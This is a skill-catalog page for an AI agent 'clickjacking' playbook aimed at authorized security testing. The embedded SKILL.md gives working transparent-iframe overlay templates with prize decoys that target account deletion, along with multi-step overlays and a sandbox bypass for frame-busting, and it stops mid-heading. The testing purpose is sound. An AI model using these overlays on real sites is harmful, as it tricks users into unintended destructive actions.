Clickjacking
Test whether pages can be framed and whether clickjacking can drive sensitive actions when X-Frame-Options or CSP frame-ancestors are weak or missing.
Overview
clickjacking is an agent skill for the Ship phase that runs a UI redress playbook for framing headers, CSP, and sensitive-action clickjacking tests.
Install
npx skills add https://github.com/yaklang/hack-skills --skill clickjackingWhat is this skill?
- Core UI redress model: transparent iframe overlay with decoy controls on attacker page
- Detection flow for X-Frame-Options DENY, SAMEORIGIN, deprecated ALLOW-FROM, and missing headers
- CSP frame-ancestors evaluation and bypass angles alongside multi-step clickjacking
- Drag-and-drop redress patterns and chaining guidance when findings escalate severity
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are unsure if critical actions on your app can be triggered inside a malicious framed page.
Who is it for?
Indie SaaS builders and testers doing authorized AppSec review before launch or after auth/billing UI changes.
Skip if: Non-security feature work or attacking third-party sites without explicit permission.
When should I use this skill?
Use when testing whether target pages can be framed, X-Frame-Options or CSP frame-ancestors are properly configured, and UI redress can trigger sensitive actions.
What do I get? / Deliverables
You get a structured test plan for frameability, header/CSP gaps, and proof-of-concept overlay scenarios for reporting or fixes.
- Frameability and header/CSP assessment notes
- PoC overlay HTML patterns suitable for a security report
Recommended Skills
Journey fit
UI redress testing belongs in pre-production security assessment, so Ship → security is the primary catalog shelf. Security covers framing headers, CSP, and chained abuse of admin actions—not general frontend polish.
How it compares
Offensive framing and CSP test playbook—not a generator for marketing landing pages or SEO content.
Common Questions / FAQ
Who is clickjacking for?
Solo builders and security testers who need a consistent clickjacking assessment method for web apps they own or are hired to test.
When should I use clickjacking?
During Ship → security before go-live or after adding admin, account, or payment flows that must not be frameable by attackers.
Is clickjacking safe to install?
It documents attack techniques for authorized testing; review the Security Audits panel on this page and never use it against sites you do not control.
SKILL.md
READMESKILL.md - Clickjacking
# SKILL: Clickjacking — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions. ## 1. CORE CONCEPT Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions. ```html <style> iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; } .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; } </style> <div class="decoy"><button>Click to win a prize!</button></div> <iframe src="https://target.com/account/delete?confirm=yes"></iframe> ``` --- ## 2. DETECTION — IS THE PAGE FRAMEABLE? ### Check X-Frame-Options Header ``` X-Frame-Options: DENY → cannot be framed (secure) X-Frame-Options: SAMEORIGIN → only same-origin framing (secure for cross-origin) X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent (header absent) → frameable! (vulnerable) ``` ### Check CSP frame-ancestors ``` Content-Security-Policy: frame-ancestors 'none' → cannot be framed Content-Security-Policy: frame-ancestors 'self' → same-origin only Content-Security-Policy: frame-ancestors https://a.com → specific origin (directive absent) → frameable ``` **CSP frame-ancestors supersedes X-Frame-Options** in modern browsers. ### Quick PoC Test ```html <iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe> ``` If the page loads in the iframe → frameable → potentially vulnerable. ### JavaScript Frame Detection (from target page source) ```javascript // Common frame-busting code found in target pages: if (top.location.hostname !== self.location.hostname) { top.location.href = self.location.href; } ``` If this code is present but not using CSP `frame-ancestors`, it can often be bypassed. --- ## 3. PROOF OF CONCEPT TEMPLATES ### Basic Single-Click ```html <html> <head><title>Free Prize</title></head> <body> <h1>Click the button to claim your prize!</h1> <style> iframe { position: absolute; top: 300px; left: 60px; width: 500px; height: 200px; opacity: 0.0001; z-index: 2; } </style> <iframe src="https://target.com/account/settings?action=delete"></iframe> </body> </html> ``` ### Multi-Step Clickjacking For actions requiring multiple clicks (e.g., "Are you sure?" confirmation): ```html <div id="step1"> <button onclick="document.getElementById('step1').style.display='none'; document.getElementById('step2').style.display='block';"> Step 1: Click here </button> </div> <div id="step2" style="display:none"> <button>Step 2: Confirm</button> </div> <iframe src="https://target.com/admin/action"></iframe> ``` Reposition iframe for each step to align the transparent button with the decoy. ### Drag-and-Drop Clickjacking Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data. --- ## 4. BYPASS TECHNIQUES ### Frame-Busting Script Bypass Some pages use JavaScript frame-busting: ```javascript if (top !== self) { top.location = self.location; } ``` **Bypass with sandbox attribute**: ```html <iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe> <!-- sandbox without allow-top-navigation prevents frame-busting --> ``` ### X-Frame-Options ALLOW-FROM Byp